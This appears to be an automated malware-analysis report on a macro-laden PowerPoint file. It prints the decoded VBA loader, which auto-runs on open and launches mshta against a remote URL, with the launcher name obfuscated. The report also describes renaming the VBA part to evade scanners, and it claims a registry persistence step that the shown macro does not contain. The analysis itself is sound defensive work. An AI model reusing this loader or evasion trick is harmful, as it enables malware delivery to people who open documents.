Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 14f82c92383ced03…

MALICIOUS

Office (OOXML)

8.2 KB First seen: 2026-06-05
MD5: ea0ffe41dc235743b76ad11e11928a42 SHA-1: bbc1eb3787c79745a24010e6266351f7aa63ed12 SHA-256: 14f82c92383ced03e45b02d9183e01f192fc889a14a6766fedb368376139a3f6
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Auto_Open subroutine, which is designed to execute automatically when the document is opened. This macro uses CreateObject to call Shell.Application and executes a command that downloads a payload from the URL https://www.bitly.com/adjcxsihicjspojcomd. The macro also attempts to establish persistence by writing to the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/rdtfiygui.b)
  • VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMED
    The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.bitly.com/adjcxsihicjspojcomd In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 825 bytes
SHA-256: 4e94343f192d869f597d01a849749822b0817d369d94b23b820660e87ac034af
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module111"

Sub _
Auto_Open _
()
Dim MsgBox As New topli
Set Outlook = CreateObject("Outlook.Application")

Set Microsoft = Outlook.CreateObject("Shell.Application")

Microsoft.ShellExecute MsgBox.mill, MsgBox.link





End _
Sub


Attribute VB_Name = "topli"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function mill()
o = StrReverse("M")
m = StrReverse("s")
l = StrReverse("H")
a = StrReverse("t")
i = StrReverse("A")
mill = o + m + l + a + i
End Function
Function link()
link = "https://www.bitly.com/adjcxsihicjspojcomd"
End Function
vbaProject_00.bin vba-project OOXML VBA project: ppt/rdtfiygui.b 17408 bytes
SHA-256: 6d246c295eb9780af78259c77b78253bb99404ec952b1b82356a6d6dd826ff96